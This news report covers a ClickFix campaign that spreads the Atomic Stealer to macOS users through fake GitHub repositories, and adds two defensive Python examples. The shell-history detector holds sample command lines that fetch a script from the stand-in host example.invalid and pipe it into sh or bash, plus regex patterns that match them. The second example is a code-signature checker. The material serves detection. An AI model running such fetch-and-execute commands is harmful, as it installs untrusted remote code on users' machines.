Redazione RHC, 23 September 2025 16:26
Cybercriminals have launched a large-scale campaign against macOS users, disguising malware as popular programs. LastPass reported this after discovering that its own product had also been spoofed. The malware is distributed through fake GitHub repositories optimized for search engines, which lets them appear at the top of Google and Bing search results.
The attack uses the ClickFix scheme: the victim is asked to paste a command into the terminal, supposedly to install an application. In reality, the command issues a curl request to an encrypted URL and downloads the install.sh script into the /tmp directory.
This script installs the Atomic Stealer (AMOS) Trojan on the victim's computer. AMOS is a malware-as-a-service (MaaS) tool that rents for $1,000 per month. Its basic function is to steal data from infected devices, but its creators recently added a backdoor for stealthy, persistent access to the system.
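The chain described above (a pasted terminal command, a curl fetch, a script dropped into /tmp and then executed, sometimes behind a base64-encoded URL) leaves recognisable traces in shell history and process-execution telemetry. The following detector is an added example written for this article; it is not code from the article, from LastPass, or from the campaign. The sample command lines are constructed and use the reserved `example.invalid` domain; the indicator names and regular expressions are this example's own choices.

```python
import re

# Constructed sample of shell-history / process command lines; not taken from
# the article. Indexes 1, 2 and 4 mimic the ClickFix chain described above.
SAMPLE_COMMANDS = [
    "ls -la ~/Downloads",
    "curl -fsSL https://example.invalid/install.sh -o /tmp/install.sh && sh /tmp/install.sh",
    "echo 'aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv' | base64 -d | xargs curl -s | bash",
    "brew install --cask 1password",
    "curl -s https://example.invalid/x | sh",
    "git clone https://github.com/example/repo",
]

# Each pattern captures one building block of the chain: fetch a remote
# resource and hand it straight to a shell, drop a script in /tmp, run a
# script out of /tmp, or decode an obfuscated (base64) URL/command first.
PATTERNS = {
    "fetch_piped_to_shell": re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b"),
    "script_dropped_in_tmp": re.compile(r"\b(?:curl|wget)\b.*?(?:-o|-O|>)\s*/tmp/\S+\.sh\b"),
    "exec_from_tmp": re.compile(r"\b(?:sh|bash|zsh)\s+/tmp/\S+"),
    "base64_decode_in_pipeline": re.compile(r"\bbase64\s+(?:--decode|-d|-D)\b.*\|"),
}


def detect(command):
    """Return the names of the ClickFix indicators found in one command line."""
    return [name for name, rx in PATTERNS.items() if rx.search(command)]


def scan(commands):
    """Map the index of every flagged command line to its list of indicators."""
    result = {}
    for i, cmd in enumerate(commands):
        hits = detect(cmd)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_COMMANDS).items():
        print(f"[{i}] {SAMPLE_COMMANDS[i]}\n     -> {', '.join(hits)}")
```

Run against `~/.zsh_history` or an EDR's process-creation feed, a single indicator (for example `fetch_piped_to_shell`) is common in legitimate installer one-liners, so it is best treated as a triage signal; two or more indicators on the same line, or a `/tmp` script executed shortly after a browser session, is a much stronger match for the behaviour described in the article.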
According to LastPass, the scammers aren't copying just a single brand. The list of counterfeit programs exceeds 100 and includes products such as 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne.
To get around being blocked, the scammers create several fake GitHub accounts and duplicate repositories, each with a “Download” button. Clicking this button takes the visitor to a secondary website containing instructions for running a command in the terminal.
Similar macOS campaigns have been documented before, including copies of Booking.com and bogus utilities that claim to “fix” system problems, distributed via ads. The current campaign is significantly broader: automation lets the attackers spin up replacement pages quickly after a takedown.
LastPass emphasizes that it continuously monitors the situation and forwards reports of fake projects to GitHub's administrators, but the threat persists because new resources are so easy to create.
Experts remind users to trust only official developer websites. If the vendor doesn't offer a macOS version of a product, any “alternative” will almost certainly be malicious.
Where a macOS app does exist, it is important to verify that it is distributed by a trusted source and not by an unknown third party.
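On macOS, the practical way to verify that a downloaded app really comes from the vendor is to inspect its code signature: `codesign -dv --verbose=2 <App.app>` prints the certificate chain and the Apple-issued Team ID on stderr, and `spctl --assess --type execute <App.app>` exits 0 only if Gatekeeper would accept it. The following checker is an added example written for this article; it is not code from the article or from LastPass. The two sample outputs are constructed (the team ID `ABCDE12345` and the company name are made up); in real use the expected Team ID must come from the vendor's own documentation, and `check_app` only works on a macOS host where both tools exist.

```python
import subprocess

# Constructed sample of what `codesign -dv --verbose=2 Example.app` prints on
# stderr for a Developer ID-signed bundle; team ID and names are made up.
SAMPLE_SIGNED = """\
Executable=/Applications/Example.app/Contents/MacOS/Example
Identifier=com.example.app
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Signature size=9000
Authority=Developer ID Application: Example Corp (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=1 Sep 2025 at 10:00:00
TeamIdentifier=ABCDE12345
Runtime Version=14.0.0
Sealed Resources version=2 rules=13 files=120
"""

# Constructed output for an ad-hoc signed binary (no Apple-issued certificate),
# which is what a self-built or attacker-built payload typically looks like.
SAMPLE_ADHOC = """\
Executable=/tmp/install
Identifier=install
Format=Mach-O thin (arm64)
CodeDirectory v=20400 size=500 flags=0x2(adhoc) hashes=10+2 location=embedded
Signature=adhoc
Info.plist=not bound
TeamIdentifier=not set
Sealed Resources=none
"""


def parse_codesign_output(text):
    """Extract TeamIdentifier, the Authority chain and the ad-hoc flag."""
    info = {"team_id": None, "authorities": [], "adhoc": False}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("TeamIdentifier="):
            value = line.split("=", 1)[1]
            info["team_id"] = None if value == "not set" else value
        elif line.startswith("Authority="):
            info["authorities"].append(line.split("=", 1)[1])
        elif line == "Signature=adhoc":
            info["adhoc"] = True
    return info


def is_trusted_signature(info, expected_team_id):
    """True only for a Developer ID chain rooted at Apple and owned by the expected team."""
    if info["adhoc"] or info["team_id"] != expected_team_id:
        return False
    has_dev_id = any(a.startswith("Developer ID Application:") for a in info["authorities"])
    has_apple_root = "Apple Root CA" in info["authorities"]
    return has_dev_id and has_apple_root


def check_app(app_path, expected_team_id):
    """Run the real tools (macOS only). Returns (signature_ok, gatekeeper_ok)."""
    cs = subprocess.run(["codesign", "-dv", "--verbose=2", app_path],
                        capture_output=True, text=True)
    # codesign exits non-zero for an unsigned object, so that alone fails the check.
    sig_ok = cs.returncode == 0 and is_trusted_signature(
        parse_codesign_output(cs.stderr), expected_team_id)
    # spctl exits 0 only if Gatekeeper would allow the bundle to run.
    gk = subprocess.run(["spctl", "--assess", "--type", "execute", app_path],
                        capture_output=True, text=True)
    return sig_ok, gk.returncode == 0
```

A bundle that is unsigned, ad-hoc signed, or signed under a Team ID other than the vendor's fails `is_trusted_signature` even if the app name and icon are perfect copies, which is exactly the gap the fake-repository campaign relies on.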